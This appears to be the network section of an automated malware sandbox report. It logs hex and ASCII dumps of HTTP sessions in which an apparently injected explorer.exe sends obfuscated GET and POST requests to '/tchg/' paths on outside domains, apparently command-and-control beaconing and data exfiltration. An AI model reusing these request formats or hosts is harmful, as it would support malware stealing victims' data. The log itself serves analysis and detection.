                                                                                                                    May 30, 2023 11:13:17.037585020 CEST1744OUTData Raw: 69 5f 66 30 4e 63 74 63 4a 4e 43 47 55 76 39 75 4f 78 33 4b 73 78 6e 58 30 75 56 48 54 47 68 76 66 4e 4e 6a 48 56 77 50 33 33 74 41 7a 54 47 52 75 6e 63 69 41 46 53 74 6c 74 6a 64 6b 72 5a 67 77 6f 31 74 6b 59 4a 35 4a 51 66 38 5a 62 56 73 67 6d
                                                                                                                    Data Ascii: i_f0NctcJNCGUv9uOx3KsxnX0uVHTGhvfNNjHVwP33tAzTGRunciAFStltjdkrZgwo1tkYJ5JQf8ZbVsgm7WXYcb~AdTFFpuB-cTtRweYkWkV1pFcN3bxBSUC07-Lo4LxIOzEAhQIsIdg0zONXpC4imVdN7HCDFA4A1lUEzCta0irjTImVHRZC0hhE5AmNnzoWLS(qLwZGbmCm97uqPNkC4ObxyHbusCcmh8qyT4V_gNndaw45u
                                                                                                                    May 30, 2023 11:13:17.037662983 CEST1753OUTData Raw: 4e 58 4a 6b 34 74 68 34 50 49 45 52 70 32 71 7a 63 79 77 6f 4c 46 66 70 34 55 57 49 46 31 34 35 45 7a 4b 76 56 30 6e 74 78 54 49 48 72 4a 4c 55 52 75 74 5f 58 79 76 65 53 4a 50 5a 4c 48 6e 72 50 66 42 68 35 38 34 79 35 58 55 59 6e 49 79 36 57 4a
                                                                                                                    Data Ascii: NXJk4th4PIERp2qzcywoLFfp4UWIF145EzKvV0ntxTIHrJLURut_XyveSJPZLHnrPfBh584y5XUYnIy6WJQbV2pW(x2EaWNLwppS5M3zr5mtRwMucXMDA-K0bNZYfs4bRy0LJV3is-saZDujn82_hL756seOn4R4(r2d2cw7yYeTyJKH5Tlyk8iuMUTkOHHWsIGrM5v-gyRUKgzJSJJ-6uF31MjwzC8PI2Lc0k~3LFR7K-sNbAP


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                    95192.168.11.204985484.32.84.3280C:\Windows\explorer.exe
                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                    May 30, 2023 11:13:19.555170059 CEST1753OUTGET /tchg/?O0qEM=27zP+uSjjQlLnilOnGJCOrnozMlpBRLg3OEmXmWOVdAdyewLZJq+JAgQDNVT6O1S8K/UhNHecCZNR/ARSVl+YwbS8ARBrMbIDw==&CF1Ki=UnDuQcdCFs1MNsvY HTTP/1.1
                                                                                                                    Host: www.comoparardefumar.website
                                                                                                                    Connection: close
                                                                                                                    Data Raw: 00 00 00 00 00 00 00
                                                                                                                    Data Ascii:
                                                                                                                    May 30, 2023 11:13:19.583468914 CEST1755INHTTP/1.1 200 OK
                                                                                                                    Server: hcdn
                                                                                                                    Date: Tue, 30 May 2023 09:13:19 GMT
                                                                                                                    Content-Type: text/html
                                                                                                                    Content-Length: 10066
                                                                                                                    Connection: close
                                                                                                                    Vary: Accept-Encoding
                                                                                                                    x-hcdn-request-id: cb53be45f16dcff44f3a5f2a86f94903-fast-edge1
                                                                                                                    Expires: Tue, 30 May 2023 09:13:18 GMT
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Accept-Ranges: bytes
                                                                                                                    Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 74 69 74 6c 65 3e 50 61 72 6b 65 64 20 44 6f 6d 61 69 6e 20 6e 61 6d 65 20 6f 6e 20 48 6f 73 74 69 6e 67 65 72 20 44 4e 53 20 73 79 73 74 65 6d 3c 2f 74 69 74 6c 65 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 2c 63 68 72 6f 6d 65 3d 31 22 20 68 74 74 70 2d 65 71 75 69 76 3d 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 3e 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 50 61 72 6b 65 64 20 44 6f 6d 61 69 6e 20 6e 61 6d 65 20 6f 6e 20 48 6f 73 74 69 6e 67 65 72 20 44 4e 53 20 73 79 73 74 65 6d 22 20 6e 61 6d 65 3d 64 65 73 63 72 69 70 74 69 6f 6e 3e 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 3e 3c 6c 69 6e 6b 20 68 72 65 66 3d 68 74 74 70 73 3a 2f 2f 6d 61 78 63 64 6e 2e 62 6f 6f 74 73 74 72 61 70 63 64 6e 2e 63 6f 6d 2f 62 6f 6f 74 73 74 72 61 70 2f 33 2e 33 2e 37 2f 63 73 73 2f 62 6f 6f 74 73 74 72 61 70 2e 6d 69 6e 2e 63 73 73 20 72 65 6c 3d 73 74 79 6c 65 73 68 65 65 74 3e 3c 73 63 72 69 70 74 20 73 72 63 3d 68 74 74 70 73 3a 2f 2f 61 6a 61 78 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6a 71 75 65 72 79 2f 33 2e 32 2e 31 2f 6a 71 75 65 72 79 2e 6d 69 6e 2e 6a 73 3e 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 20 73 72 63 3d 68 74 74 70 73 3a 2f 2f 6d 61 78 63 64 6e 2e 62 6f 6f 74 73 74 72 61 70 63 64 6e 2e 63 6f 6d 2f 62 6f 6f 74 73 74 72 61 70 2f 33 2e 33 2e 37 2f 6a 73 2f 62 6f 6f 74 73 74 72 61 70 2e 6d 69 6e 2e 6a 73 3e 3c 2f 73 63 72 69 70 74 3e 3c 6c 69 6e 6b 20 68 72 65 66 3d 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 66 6f 6e 74 2d 61 77 65 73 6f 6d 65 2f 35 2e 31 35 2e 33 2f 63 73 73 2f 61 6c 6c 2e 6d 69 6e 2e 63 73 73 20 72 65 6c 3d 73 74 79 6c 65 73 68 65 65 74 3e 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 4f 70 65 6e 2b 53 61 6e 73 3a 33 30 30 2c 33 30 30 69 2c 34 30 30 2c 34 30 30 69 2c 36 30 30 2c 36 30 30 69 2c 37 30 30 2c 37 30 30 69 2c 38 30 30 2c 38 30 30 69 26 73 75 62 73 65 74 3d 63 79 72 69 6c 6c 69 63 2c 63 79 72 69 6c 6c 69 63 2d 65 78 74 2c 67 72 65 65 6b 2c 67 72 65 65 6b 2d 65 78 74 2c 6c 61 74 69 6e 2d 65 78 74 2c 76 69 65 74 6e 61 6d 65 73 65 22 20 72 65 6c 3d 73 74 79 6c 65 73 68 65 65 74 3e 3c 73 74 79 6c 65 3e 68 74 6d 6c 7b 68 65 69 67 68 74 3a 31 30 30 25 7d 62 6f 64 79 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 4f 70 65 6e 20 53 61 6e 73 22 2c 48 65 6c 76 65 74 69 63 61 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 23 30 30 30 3b 70 61 64 64 69 6e 67 3a 30 3b 6d 61 72 67 69 6e 3a 30 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 2e 34 32 38
                                                                                                                    Data Ascii: <!doctype html><title>Parked Domain name on Hostinger DNS system</title><meta charset=utf-8><meta content="IE=edge,chrome=1" http-equiv=X-UA-Compatible><meta content="Parked Domain name on Hostinger DNS system" name=description><meta content="width=device-width,initial-scale=1" name=viewport><link href=https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/css/bootstrap.min.css rel=stylesheet><script src=https://ajax.googleapis.com/ajax/libs/jquery/3.2.1/jquery.min.js></script><script src=https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/js/bootstrap.min.js></script><link href=https://cdnjs.cloudflare.com/ajax/libs/font-awesome/5.15.3/css/all.min.css rel=stylesheet><link href="https://fonts.googleapis.com/css?family=Open+Sans:300,300i,400,400i,600,600i,700,700i,800,800i&subset=cyrillic,cyrillic-ext,greek,greek-ext,latin-ext,vietnamese" rel=stylesheet><style>html{height:100%}body{font-family:"Open Sans",Helvetica,sans-serif;color:#000;padding:0;margin:0;line-height:1.428
                                                                                                                    May 30, 2023 11:13:19.583544016 CEST1756INData Raw: 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 30 2e 37 64 65 67 2c 23 65 39 65 64 66 62 20 2d 35 30 2e 32 31 25 2c 23 66 36 66 38 66 64 20 33 31 2e 31 31 25 2c 23 66 66 66 20 31 36 36 2e 30 32 25 29 7d 68
                                                                                                                    Data Ascii: ;background:linear-gradient(10.7deg,#e9edfb -50.21%,#f6f8fd 31.11%,#fff 166.02%)}h1,h2,h3,h4,h5,h6,p{padding:0;margin:0;color:#333}h1{font-size:30px;font-weight:600!important;color:#333}h2{font-size:24px;font-weight:600}h3{font-size:22px;font-
                                                                                                                    May 30, 2023 11:13:19.583602905 CEST1757INData Raw: 61 76 3e 6c 69 3e 61 20 69 7b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 35 70 78 7d 2e 6e 61 76 2d 62 61 72 20 69 6d 67 7b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 74 6f 70 3a 33 70 78 7d 2e 63 6f 6e 67 72 61 74 7a 7b 6d 61 72 67 69 6e
                                                                                                                    Data Ascii: av>li>a i{margin-right:5px}.nav-bar img{position:relative;top:3px}.congratz{margin:0 auto;text-align:center}.top-container{display:flex;flex-direction:row}.message-subtitle{color:#2f1c6a;font-weight:700;font-size:24px;line-height:32px;margin-b
                                                                                                                    May 30, 2023 11:13:19.583658934 CEST1759INData Raw: 3a 31 36 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 32 30 70 78 3b 6d 69 6e 2d 77 69 64 74 68 3a 32 30 70 78 3b 76 65 72 74 69 63 61 6c 2d 61 6c 69 67 6e 3a 6d 69 64 64 6c 65 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 64 69 73 70 6c
                                                                                                                    Data Ascii: :16px;min-height:20px;min-width:20px;vertical-align:middle;text-align:center;display:inline-block;padding:4px 8px;font-weight:700;border-radius:4px;background-color:#fc5185}@media screen and (max-width:768px){.message{width:100%;padding:35px 0
                                                                                                                    May 30, 2023 11:13:19.583714008 CEST1760INData Raw: 77 3e 3c 69 20 61 72 69 61 2d 68 69 64 64 65 6e 3d 74 72 75 65 20 63 6c 61 73 73 3d 22 66 61 73 20 66 61 2d 67 72 61 64 75 61 74 69 6f 6e 2d 63 61 70 22 3e 3c 2f 69 3e 20 54 75 74 6f 72 69 61 6c 73 3c 2f 61 3e 3c 2f 6c 69 3e 3c 6c 69 3e 3c 61 20
                                                                                                                    Data Ascii: w><i aria-hidden=true class="fas fa-graduation-cap"></i> Tutorials</a></li><li><a href=https://support.hostinger.com/en/ rel=nofollow><i aria-hidden=true class="fa-readme fab"></i>Knowledge base</a></li><li><a href=https://www.hostinger.com/af
                                                                                                                    May 30, 2023 11:13:19.583767891 CEST1761INData Raw: 63 63 65 73 73 66 75 6c 20 6f 6e 6c 69 6e 65 20 70 72 6f 6a 65 63 74 73 2e 3c 2f 70 3e 3c 62 72 3e 3c 61 20 68 72 65 66 3d 68 74 74 70 73 3a 2f 2f 77 77 77 2e 68 6f 73 74 69 6e 67 65 72 2e 63 6f 6d 20 72 65 6c 3d 6e 6f 66 6f 6c 6c 6f 77 3e 46 69
                                                                                                                    Data Ascii: ccessful online projects.</p><br><a href=https://www.hostinger.com rel=nofollow>Find your hosting plan</a></div></div><div class="col-xs-12 col-sm-4 column-custom-wrap"><div class=column-custom><div class=column-title>Add website to your hosti
                                                                                                                    May 30, 2023 11:13:19.583823919 CEST1763INData Raw: 3b 6e 3c 74 3b 29 7b 69 66 28 35 35 32 39 36 3d 3d 28 36 33 34 38 38 26 28 72 3d 6f 5b 6e 2b 2b 5d 29 29 29 74 68 72 6f 77 20 6e 65 77 20 52 61 6e 67 65 45 72 72 6f 72 28 22 55 54 46 2d 31 36 28 65 6e 63 6f 64 65 29 3a 20 49 6c 6c 65 67 61 6c 20
                                                                                                                    Data Ascii: ;n<t;){if(55296==(63488&(r=o[n++])))throw new RangeError("UTF-16(encode): Illegal UTF-16 value");65535<r&&(r-=65536,e.push(String.fromCharCode(r>>>10&1023|55296)),r=56320|1023&r),e.push(String.fromCharCode(r))}return e.join("")}};var o=36,r=21
                                                                                                                    May 30, 2023 11:13:19.583879948 CEST1764INData Raw: 7d 69 66 28 74 29 66 6f 72 28 66 3d 30 2c 77 3d 6d 2e 6c 65 6e 67 74 68 3b 66 3c 77 3b 66 2b 2b 29 79 5b 66 5d 26 26 28 6d 5b 66 5d 3d 53 74 72 69 6e 67 2e 66 72 6f 6d 43 68 61 72 43 6f 64 65 28 6d 5b 66 5d 29 2e 74 6f 55 70 70 65 72 43 61 73 65
                                                                                                                    Data Ascii: }if(t)for(f=0,w=m.length;f<w;f++)y[f]&&(m[f]=String.fromCharCode(m[f]).toUpperCase().charCodeAt(0));return this.utf16.encode(m)},this.encode=function(t,a){var h,f,i,c,u,d,l,p,g,s,C,w;a&&(w=this.utf16.decode(t));var v=(t=this.utf16.decode(t.toL
                                                                                                                    May 30, 2023 11:13:19.583930016 CEST1764INData Raw: 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 70 61 74 68 4e 61 6d 65 22 29 3b 61 63 63 6f 75 6e 74 2e 69 6e 6e 65 72 48 54 4d 4c 3d 70 75 6e 79 63 6f 64 65 2e 54 6f 55 6e 69 63 6f 64 65 28 70 61 74 68 4e 61 6d 65 29 3c 2f
                                                                                                                    Data Ascii: cument.getElementById("pathName");account.innerHTML=punycode.ToUnicode(pathName)</script>


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                    96192.168.11.2049855185.106.208.380C:\Windows\explorer.exe
                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                    May 30, 2023 11:13:24.635586977 CEST1765OUTPOST /tchg/ HTTP/1.1
                                                                                                                    Host: www.albaymedya.com
                                                                                                                    Connection: close
                                                                                                                    Content-Length: 187
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Origin: http://www.albaymedya.com
                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                    Accept: */*
                                                                                                                    Referer: http://www.albaymedya.com/tchg/
                                                                                                                    Accept-Language: en-US
                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                    Data Raw: 4f 30 71 45 4d 3d 75 53 72 36 46 70 65 47 62 73 54 59 58 79 48 63 32 62 57 61 5a 7a 39 41 4d 59 41 4b 41 46 36 6f 39 53 6c 46 50 4e 49 34 76 65 77 31 69 48 28 44 30 6f 4c 50 70 45 4b 5a 4b 56 4d 30 38 49 74 75 7e 6c 33 71 38 77 33 34 65 51 77 41 55 45 62 49 34 49 33 71 4c 7a 28 57 70 5f 67 44 75 4a 46 37 31 56 47 79 42 6e 5a 79 6f 43 39 41 47 72 61 31 70 51 36 4b 52 72 58 64 4f 47 49 48 47 4d 53 79 28 36 4a 74 41 6c 6a 48 39 52 41 35 32 61 73 59 59 64 6e 61 48 75 71 4e 6b 6b 4e 71 76 37 36 75 68 78 71 73 51 41 70 31 30 31 69 73 52 7a 65 4e 57 51 29 2e 00 00 00 00 00 00 00 00
                                                                                                                    Data Ascii: O0qEM=uSr6FpeGbsTYXyHc2bWaZz9AMYAKAF6o9SlFPNI4vew1iH(D0oLPpEKZKVM08Itu~l3q8w34eQwAUEbI4I3qLz(Wp_gDuJF71VGyBnZyoC9AGra1pQ6KRrXdOGIHGMSy(6JtAljH9RA52asYYdnaHuqNkkNqv76uhxqsQAp101isRzeNWQ).
                                                                                                                    May 30, 2023 11:13:24.682410955 CEST1766INHTTP/1.1 404 Not Found
                                                                                                                    Server: nginx
                                                                                                                    Date: Tue, 30 May 2023 09:13:23 GMT
                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                    Content-Length: 146
                                                                                                                    Connection: close
                                                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                    Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                    97192.168.11.2049856185.106.208.380C:\Windows\explorer.exe
                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                    May 30, 2023 11:13:27.212985992 CEST1767OUTPOST /tchg/ HTTP/1.1
                                                                                                                    Host: www.albaymedya.com
                                                                                                                    Connection: close
                                                                                                                    Content-Length: 527
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Origin: http://www.albaymedya.com
                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                    Accept: */*
                                                                                                                    Referer: http://www.albaymedya.com/tchg/
                                                                                                                    Accept-Language: en-US
                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                    Data Raw: 4f 30 71 45 4d 3d 75 53 72 36 46 70 65 47 62 73 54 59 52 68 50 63 37 63 69 61 4f 44 39 50 4a 59 41 4b 62 56 37 41 39 53 70 46 50 4d 63 53 75 72 67 31 69 6e 50 44 6d 35 4c 50 71 45 4b 5a 42 31 4d 74 6a 59 74 54 7e 6c 4c 69 38 31 66 34 65 51 55 41 55 78 50 49 7e 34 33 70 54 44 28 56 6f 5f 67 41 71 4a 45 30 31 56 36 66 42 6d 4e 79 6f 52 35 41 48 70 79 31 7e 53 53 4a 62 72 58 58 5a 32 49 41 54 63 53 38 28 36 46 54 41 6c 62 39 39 69 63 35 32 36 4d 59 4b 64 6e 64 4e 65 72 6b 38 6b 4e 30 6e 35 66 4c 6b 6e 53 44 49 44 4a 46 30 33 58 76 56 44 50 63 44 35 77 64 66 78 53 4a 7a 75 70 54 72 6a 71 37 78 41 6f 62 66 39 30 59 70 73 65 4a 41 67 31 4b 43 5a 57 4f 6d 6a 62 43 50 79 52 61 72 71 46 55 35 47 69 4a 39 35 4f 30 56 74 4e 33 4b 68 75 67 36 70 65 55 7e 41 67 77 35 63 62 39 51 69 63 6c 7e 6d 58 33 68 2d 77 6e 39 31 76 2d 50 38 6c 63 28 59 46 2d 46 66 42 74 75 4c 79 33 54 37 54 4c 75 32 37 68 77 4d 35 70 58 53 4e 6c 56 71 57 6b 4e 78 64 69 67 2d 28 2d 73 35 70 68 43 67 69 75 30 6e 74 77 6f 49 71 39 7e 4f 76 57 48 39 35 75 38 6f 4c 6d 6f 69 46 74 70 37 6e 66 39 75 4d 6e 6a 45 68 72 76 5f 51 6d 37 7a 39 6d 4f 4e 69 4b 4a 72 47 6c 77 47 4d 32 45 59 4a 66 62 57 43 44 78 38 74 37 43 35 4f 49 6e 6a 53 67 75 4d 7a 76 65 78 32 52 65 59 35 6f 71 33 74 32 46 79 64 72 4a 55 62 4b 54 58 44 37 68 6c 6e 73 75 46 73 72 53 49 32 5a 46 79 65 78 50 70 33 58 36 78 66 68 76 70 78 6b 48 62 6f 73 6b 4a 4f 45 59 54 71 66 7e 77 31 6e 77 32 68 4d 77 79 6d 47 5a 37 6b 65 59 4f 78 35 70 32 4b 62 4d 44 4f 76 67 79 31 61 4e 77 41 65 6d 58 6d 2d 30 5f 76 77 55 2d 73 6a 51 56 7a 6f 45 7a 41 2e 00 00 00 00 00 00 00 00
                                                                                                                    Data Ascii: O0qEM=uSr6FpeGbsTYRhPc7ciaOD9PJYAKbV7A9SpFPMcSurg1inPDm5LPqEKZB1MtjYtT~lLi81f4eQUAUxPI~43pTD(Vo_gAqJE01V6fBmNyoR5AHpy1~SSJbrXXZ2IATcS8(6FTAlb99ic526MYKdndNerk8kN0n5fLknSDIDJF03XvVDPcD5wdfxSJzupTrjq7xAobf90YpseJAg1KCZWOmjbCPyRarqFU5GiJ95O0VtN3Khug6peU~Agw5cb9Qicl~mX3h-wn91v-P8lc(YF-FfBtuLy3T7TLu27hwM5pXSNlVqWkNxdig-(-s5phCgiu0ntwoIq9~OvWH95u8oLmoiFtp7nf9uMnjEhrv_Qm7z9mONiKJrGlwGM2EYJfbWCDx8t7C5OInjSguMzvex2ReY5oq3t2FydrJUbKTXD7hlnsuFsrSI2ZFyexPp3X6xfhvpxkHboskJOEYTqf~w1nw2hMwymGZ7keYOx5p2KbMDOvgy1aNwAemXm-0_vwU-sjQVzoEzA.
                                                                                                                    May 30, 2023 11:13:27.259865999 CEST1767INHTTP/1.1 404 Not Found
                                                                                                                    Server: nginx
                                                                                                                    Date: Tue, 30 May 2023 09:13:26 GMT
                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                    Content-Length: 146
                                                                                                                    Connection: close
                                                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                    Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                    98192.168.11.2049857185.106.208.380C:\Windows\explorer.exe
                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                    May 30, 2023 11:13:29.791526079 CEST1771OUTPOST /tchg/ HTTP/1.1
                                                                                                                    Host: www.albaymedya.com
                                                                                                                    Connection: close
                                                                                                                    Content-Length: 51815
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Origin: http://www.albaymedya.com
                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                    Accept: */*
                                                                                                                    Referer: http://www.albaymedya.com/tchg/
                                                                                                                    Accept-Language: en-US
                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                    Data Raw: 4f 30 71 45 4d 3d 75 53 72 36 46 70 65 47 62 73 54 59 52 68 50 63 37 63 69 61 4f 44 39 50 4a 59 41 4b 62 56 37 41 39 53 70 46 50 4d 63 53 75 72 6f 31 68 57 76 44 30 4b 6a 50 72 45 4b 5a 43 31 4d 6f 6a 59 74 43 7e 6c 54 6d 38 31 62 6f 65 53 63 41 56 67 66 49 7e 4b 50 70 46 54 28 55 69 66 67 43 75 4a 46 31 31 56 47 4c 42 6d 59 48 6f 42 4e 41 47 70 43 31 70 7a 53 4b 5a 37 58 64 5a 32 49 55 43 4d 53 43 28 35 70 44 41 6c 48 39 39 67 6f 35 33 4d 41 59 5a 71 7a 64 45 75 72 6c 31 45 4d 30 7e 70 66 69 6b 6e 75 58 49 44 4a 5f 30 32 44 76 56 42 33 63 45 34 77 65 66 52 53 4a 36 4f 70 4d 38 54 6d 5f 78 44 4d 44 66 39 41 59 70 72 4b 4a 50 67 31 4b 55 49 57 50 79 7a 62 59 4c 79 51 63 39 61 5a 6d 35 47 33 34 39 39 57 30 57 64 5a 33 49 53 47 67 32 71 47 55 33 41 67 2d 39 63 61 37 66 43 63 35 7e 69 4c 56 68 5f 51 64 39 31 37 2d 4f 63 46 63 76 71 68 35 49 76 41 6f 74 4c 79 75 5a 62 66 48 75 79 66 74 77 4d 35 35 58 51 68 6c 55 5a 65 6b 4d 77 64 68 67 75 28 6c 77 35 70 4f 4d 41 75 34 30 6e 68 6f 6f 4a 54 32 7e 4e 44 57 47 64 35 75 34 35 4c 6e 67 53 46 71 68 62 6d 47 7a 4f 4d 30 6a 45 73 49 76 2d 6b 59 37 41 35 6d 4e 64 79 4b 59 72 47 69 36 47 4d 71 4f 34 4a 46 52 32 43 44 78 38 78 46 43 35 43 49 6d 52 43 67 76 2d 37 76 62 69 65 52 63 59 35 71 71 33 74 64 46 79 5a 59 4a 55 54 30 54 58 54 64 68 6d 4c 73 75 55 63 72 43 5a 32 61 42 43 65 77 59 4a 33 62 33 52 54 32 76 6f 64 73 48 62 34 6a 6a 36 36 45 5a 54 61 66 76 67 31 6b 31 57 68 4c 6d 69 6e 66 64 37 67 53 59 49 55 4f 70 33 76 45 4d 45 61 76 6a 6d 6f 44 53 30 77 57 39 45 48 55 6f 49 33 56 62 75 38 41 4a 48 6e 43 51 47 50 30 50 73 6e 73 77 41 4d 4a 73 4a 6c 57 78 58 47 4c 57 4e 58 43 4c 50 72 58 28 64 58 48 45 39 66 70 66 30 6b 75 37 4b 31 41 67 45 66 6b 71 67 65 31 42 41 57 6b 7a 6a 4b 49 61 6d 56 66 78 6c 54 46 34 47 48 5a 78 52 4b 53 6c 64 28 78 43 39 61 64 61 45 33 4a 4e 71 56 39 55 4c 54 67 56 43 51 31 6f 50 32 7a 55 72 54 46 4c 67 4d 58 7e 64 6d 66 28 31 66 70 32 33 41 6c 50 55 42 4c 69 70 68 78 51 37 6e 6c 39 4c 28 4a 34 36 62 6d 37 4a 39 36 54 47 33 36 4c 38 41 52 69 61 63 4f 35 35 51 68 75 32 30 42 7e 31 4c 67 4e 5a 42 70 34 4b 37 33 4b 31 77 52 75 78 4e 49 32 53 69 6f 73 76 58 63 6e 6f 74 46 31 6a 53 47 6b 54 59 66 28 4d 6e 6e 58 56 38 31 65 68 41 75 65 37 35 49 69 73 6c 49 69 67 47 57 70 30 6d 62 62 58 70 36 52 78 4b 54 55 4f 69 54 6e 52 69 63 52 4d 70 46 7a 34 78 37 76 6b 33 34 6c 4f 4f 79 57 43 68 44 66 4c 38 4a 6c 4b 48 50 51 68 32 43 72 59 61 71 47 36 30 59 4c 76 74 31 28 6a 34 45 66 48 6d 49 35 4c 77 77 52 75 46 44 6f 63 71 55 65 63 50 62 7e 7a 6c 4d 34 70 31 72 54 49 67 74 6d 4f 71 76 73 6f 52 4f 48 4b 43 6c 78 58 46 43 7e 6c 75 72 65 53 4b 42 28 61 67 4d 47 65 51 48 7e 44 39 5a 73 2d 42 34 55 45 43 52 6d 59 55 77 4f 4a 32 44 39 55 64 65 30 64 75 65 39 35 76 35 65 77 4d 7a 37 52 6b 68 7a 34 52 74 44 34 4a 4a 6f 72 57 64 4a 37 28 39 43 79 66 50 44 4e 4d 33 48 33 47 4e 6d 48 73 35 59 70 4f 4a 49 6e 7a 32 72 58 32 5f 4c 6e 56 52 6d 6d 4e 73 63 43 73 48 43 6c 67 65 39 72 52 72 5a 44 65 71 6b 55 67 74 51 47 59 35 52 35 6b 5a 41 4c 31 73 30 54 34 6b 7e 49 76 77 6f 5f 30 52 4b 56 59 6f 75 52 61 4e 61 61 35 6a 4f 6d 65 6d 32 65 66 5f 48 41 42 52 42 5a 48 66 47 6e 43 68 43 31 62 56 6c 48 34 31 45 79 50 67 6e 4e 39 45 39 51 62 39 64 64 4d 79 38 33 65 5a 6c 75 32 75 37 49 41 36 76 2d 45 44 76 69 44 4b 35 4b 4b 4b 77 56 41 4d 79 62 6f 47 34 72 69 4b 6e 4a 57 39 31 54 43 6c 68 5a 77 56 28 56 48 65 57 48 72 77 30 72 4f 36 33 34 56 33 4c 37 56 77 54 35 38 79 4f 56 30 59 56 5a 39 56 64 44 50 4c 56 59 70 79 64 4f 66 34 57 41 35 34 73 36 45 67 5a 52 70 4d 62 2d 69 32 54 51 34 35 39 68 77 72 30 2d 30 63 6f 35 77 4d 58 57 65 62 30 69 5a 4a 6c 37 4d 6a 76 73 28 51 73 72 71 54 4c 78 31 53 56 63 66 61 32 4d 6f 79 67 57 53 33 64 4d 67 57 77 37 36 4b 51 79 34 61 45 57 34 62 6f 37 44 30 7a 53 61 48 37 51 74 59 38 5a 6a 79 51 42 63 78 33 44 71 61 51 72 5a 72 72 34 75 32 37 62 58 6f 67 30 41 36 30 77 34 62 37 79 4d 73 53 79 48 51 4c 